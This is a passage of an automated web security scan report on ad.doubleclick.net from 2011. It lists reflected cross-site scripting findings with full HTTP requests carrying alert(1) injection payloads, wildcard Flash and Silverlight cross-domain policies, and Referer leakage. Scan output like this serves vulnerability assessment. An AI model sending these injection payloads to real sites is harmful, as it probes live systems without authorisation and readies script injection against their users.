Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5939

document.write('\n<script src=\"http://s
...[SNIP]...
aunch_LikeAnofall_728x90.jpg";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=Geff85"-alert(1)-"c9371b25c04&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/a%3B234424146%3B0-0%3B0%3B59000132%3B3454-728/90%3B3
...[SNIP]...

3.77. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68597'-alert(1)-'a45d88b88dc was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!68597'-alert(1)-'a45d88b88dc&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5939

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!68597'-alert(1)-'a45d88b88dc&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/a%3B234424146%3B0-0%3B0%3B5900013
...[SNIP]...

3.78. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4de9"-alert(1)-"5d2dfee3218 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!b4de9"-alert(1)-"5d2dfee3218&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5868

document.write('\n<script src=\"http://s
...[SNIP]...
1/CHV_2010_Cruze2011Launch_ItsSo2012_728x90.JPG";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!b4de9"-alert(1)-"5d2dfee3218&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/j%3B234424146%3B3-0%3B0%3B5900013
...[SNIP]...

3.79. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37d3f'-alert(1)-'0474cc55e2b was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=37d3f'-alert(1)-'0474cc55e2b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5868
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:45:28 GMT
Expires: Sun, 13 Feb 2011 14:45:28 GMT

document.write('\n<script src=\"http://s
...[SNIP]...
" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=37d3f'-alert(1)-'0474cc55e2bhttp://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/j%3B234424146%3B3-0%3B0%3B59000132%3B3454-728/90%3B40029750/40047537/1%3B%3B%7Efdr%3D235152409%3B0-0%3B0%3B58999181%3B3454-728/90%3B40323570/4034
...[SNIP]...

3.80. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2afd9"-alert(1)-"af482d2952e was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=2afd9"-alert(1)-"af482d2952e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5939
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:45:24 GMT
Expires: Sun, 13 Feb 2011 14:45:24 GMT

document.write('\n<script src=\"http://s
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=2afd9"-alert(1)-"af482d2952ehttp://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/a%3B234424146%3B0-0%3B0%3B59000132%3B3454-728/90%3B39161911/39179698/1%3B%3B%7Efdr%3D235152409%3B0-0%3B0%3B58999181%3B3454-728/90%3B40323570/4034
...[SNIP]...

4. Flash cross-domain policy previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Request

GET /crossdomain.xml HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/masthead.swf?v1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Fri, 11 Feb 2011 18:16:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5. Silverlight cross-domain policy previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 18:54:04 GMT
Date: Fri, 11 Feb 2011 18:16:33 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6. Cross-domain Referer leakage previous next
There are 13 instances of this issue:

/adi/N4359.msn.comOX2567/B5091231.144
/adi/N4359.msn.comOX2567/B5091231.146
/adi/N5047.132797.8628078479321/B4150925.22
/adi/N5877.1509.0558551710521/B5104260.30
/adi/pcw.main.news/topics/consumer_advice/article
/adi/pcw.main.news/topics/consumer_advice/article
/adi/pcw.main.news/topics/consumer_advice/article
/adi/pcw.main.news/topics/consumer_advice/article
/adi/pcw.main.news/topics/consumer_advice/article
/adi/pcw.main.search/index
/adi/pcw.main.search/index
/adi/pcw.main.search/index
/adj/ars.dart/ce_gear

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

6.1. http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4359.msn.comOX2567/B5091231.144

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.144;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/11000000000033118.1?!&&PID=8154750&UIT=G&TargetID=28683750&AN=1662206136&PG=LIFYGB&ASID=f58c59c1bef74d229169f04a72a59f63&destination=;ord=1662206136?

The response contains the following links to other domains:

http://s0.2mdn.net/1359940/dep_swirl_300x250_24k_j_MSN.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4359.msn.comOX2567/B5091231.144;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/11000000000033118.1?!&&PID=8154750&UIT=G&TargetID=28683750&AN=1662206136&PG=LIFYGB&ASID=f58c59c1bef74d229169f04a72a59f63&destination=;ord=1662206136? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://lifestyle.msn.com/your-life/your-money-today/staticslideshow.aspx?cp-documentid=27521348&gt1=32078
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 18:33:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6352

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ankamericard-cash-rewards-credit-card.html?cm_mmc=Cons-CC-_-MSN-_-dep_swirl_300x250_30k_s_MSN.swf-_-MSN_Partnership_YourMoney_MSNLifestyle_Sponsorship_NA_300x250_Flash__NA_CPM_NA_LifestyleFinance_TBD"><img src="http://s0.2mdn.net/1359940/dep_swirl_300x250_24k_j_MSN.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

6.2. http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.146 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4359.msn.comOX2567/B5091231.146

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.146;sz=728x90;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/108000000000039984.1?!&&PID=8154749&UIT=G&TargetID=28683749&AN=33555376&PG=LIFYGA&ASID=a370df9d65ca414abafbef7a72fcb6d3&destination=;ord=33555376?

The response contains the following links to other domains:

http://s0.2mdn.net/1359940/dep_swirl_728x90_40k_v2_j_MSN.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4359.msn.comOX2567/B5091231.146;sz=728x90;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/108000000000039984.1?!&&PID=8154749&UIT=G&TargetID=28683749&AN=33555376&PG=LIFYGA&ASID=a370df9d65ca414abafbef7a72fcb6d3&destination=;ord=33555376? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://lifestyle.msn.com/your-life/your-money-today/staticslideshow.aspx?cp-documentid=27521348&gt1=32078
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6355
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 11 Feb 2011 18:33:07 GMT
Expires: Fri, 11 Feb 2011 18:33:07 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
nkamericard-cash-rewards-credit-card.html?cm_mmc=Cons-CC-_-MSN-_-dep_swirl_728x90_40k_v2_s_MSN.swf-_-MSN_Partnership_YourMoney_MSNLifestyle_Sponsorship_NA_728x90_Flash__NA_CPM_NA_LifestyleFinance_TBD"><img src="http://s0.2mdn.net/1359940/dep_swirl_728x90_40k_v2_j_MSN.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

6.3. http://ad.doubleclick.net/adi/N5047.132797.8628078479321/B4150925.22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5047.132797.8628078479321/B4150925.22

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5047.132797.8628078479321/B4150925.22;sz=300x600;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=1691epc5v/M=601051001.601379505.485973551.485973551/D=acont/S=2143440276:SKY/Y=YAHOO/E=acont:/EXP=1297455486/L=1CM1qUwNBq6AOlnWTSJnlRmErcHW801VfV4AAV8l/B=OBsIBUwNPUk-/J=1297448286106965/K=i.p3kTtZ8NtM7LPPkyldmw/A=2087240508667204454/R=1/X=3/*;ord=1297448286106965?

The response contains the following links to other domains:

http://data.cmcore.com/imp?tid=17&ci=90223951&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=DoubleClick-_-No_Script-_-No_Script-_-No_Script
http://edge.quantserve.com/quant.js
http://global.ard.yahoo.com/SIG=1691epc5v/M=601051001.601379505.485973551.485973551/D=acont/S=2143440276:SKY/Y=YAHOO/E=acont:/EXP=1297455486/L=1CM1qUwNBq6AOlnWTSJnlRmErcHW801VfV4AAV8l/B=OBsIBUwNPUk-/J=1297448286106965/K=i.p3kTtZ8NtM7LPPkyldmw/A=2087240508667204454/R=1/X=3/*http:/ad.doubleclick.net/click;h=v8/3aab/7/112/*/b;225065518;0-0;0;48897067;4986-300/600;34683888/34701766/1;;~sscs=?http:/aptm.phoenix.edu/?creative_desc=PLDR_WhiteRed_Button_300X600_F8_Tag_swf&provider=Associated_Content&keyword=associated_content_300X600_business_finance&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=300x600&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=34683888&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-Associated_Content-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=34683888&cm_mmca4=PLDR_WhiteRed_Button_300X600_F8_Tag_swf&cm_mmca5=300x600&cm_mmca6=dir_dsply&cm_mmca7=associated_content_300X600_business_finance&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1
http://pixel.quantserve.com/pixel/p-1alT5ihT03xtM.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.48897067,_imp.placement.225065518,_imp.creative.34683888
http://s0.2mdn.net/1676624/PLDR_WhiteRed_Button_NewLogo_300x600.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5047.132797.8628078479321/B4150925.22;sz=300x600;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=1691epc5v/M=601051001.601379505.485973551.485973551/D=acont/S=2143440276:SKY/Y=YAHOO/E=acont:/EXP=1297455486/L=1CM1qUwNBq6AOlnWTSJnlRmErcHW801VfV4AAV8l/B=OBsIBUwNPUk-/J=1297448286106965/K=i.p3kTtZ8NtM7LPPkyldmw/A=2087240508667204454/R=1/X=3/*;ord=1297448286106965? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.associatedcontent.com/business/?cat=3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8825
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 11 Feb 2011 18:18:08 GMT
Expires: Fri, 11 Feb 2011 18:18:08 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript>
<IMG SRC="http://data.cmcore.com/imp?tid=17&ci=90223951&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=DoubleClick-_-No_Script-_-No_Script-_-No_Script" BORDER=0 WIDTH=1 HEIGHT=1 alt=""/>
<a target="_blank" href="http://global.ard.yahoo.com/SIG=1691epc5v/M=601051001.601379505.485973551.485973551/D=acont/S=2143440276:SKY/Y=YAHOO/E=acont:/EXP=1297455486/L=1CM1qUwNBq6AOlnWTSJnlRmErcHW801VfV4AAV8l/B=OBsIBUwNPUk-/J=1297448286106965/K=i.p3kTtZ8NtM7LPPkyldmw/A=2087240508667204454/R=1/X=3/*http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/7/112/%2a/b%3B225065518%3B0-0%3B0%3B48897067%3B4986-300/600%3B34683888/34701766/1%3B%3B%7Esscs%3D%3fhttp://aptm.phoenix.edu/?creative_desc=PLDR_WhiteRed_Button_300X600_F8_Tag_swf&provider=Associated_Content&keyword=associated_content_300X600_business_finance&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=300x600&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=34683888&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-Associated_Content-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=34683888&cm_mmca4=PLDR_WhiteRed_Button_300X600_F8_Tag_swf&cm_mmca5=300x600&cm_mmca6=dir_dsply&cm_mmca7=associated_content_300X600_business_finance&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1"><img src="http://s0.2mdn.net/1676624/PLDR_WhiteRed_Button_NewLogo_300x600.gif" width="300" height="600" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-1alT5ihT03xtM.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.48897067,_imp.placement.225065518,_imp.creative.34683888" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

6.4. http://ad.doubleclick.net/adi/N5877.1509.0558551710521/B5104260.30 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5877.1509.0558551710521/B5104260.30

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5877.1509.0558551710521/B5104260.30;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=16a0cflfm/M=601197028.601690728.553434551.602895051/D=acont/S=2143440276:LREC/Y=YAHOO/E=acont:/EXP=1297455486/L=ynHb1EwNBq6AOlnWTSJnlQqBrcHW801VfV4AAU3T/B=Kw8rBWKImgo-/J=1297448286106314/K=i.p3kTtZ8NtM7LPPkyldmw/A=2376983297422890755/R=1/X=3/*;ord=1297448286106314?

The response contains the following links to other domains:

http://global.ard.yahoo.com/SIG=16a0cflfm/M=601197028.601690728.553434551.602895051/D=acont/S=2143440276:LREC/Y=YAHOO/E=acont:/EXP=1297455486/L=ynHb1EwNBq6AOlnWTSJnlQqBrcHW801VfV4AAU3T/B=Kw8rBWKImgo-/J=1297448286106314/K=i.p3kTtZ8NtM7LPPkyldmw/A=2376983297422890755/R=1/X=3/*http:/ad.doubleclick.net/click;h=v8/3aab/7/113/*/v;234259830;1-0;0;58058786;4307-300/250;39874548/39892335/2;;~sscs=?http:/www.forex.com/land-dummies.html?v=displaydum2&src=201101BTA7665&utm_source=Yahoo&utm_medium=banner&utm_campaign=2011DisplayUS
http://s0.2mdn.net/2363305/Dumrefresh_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

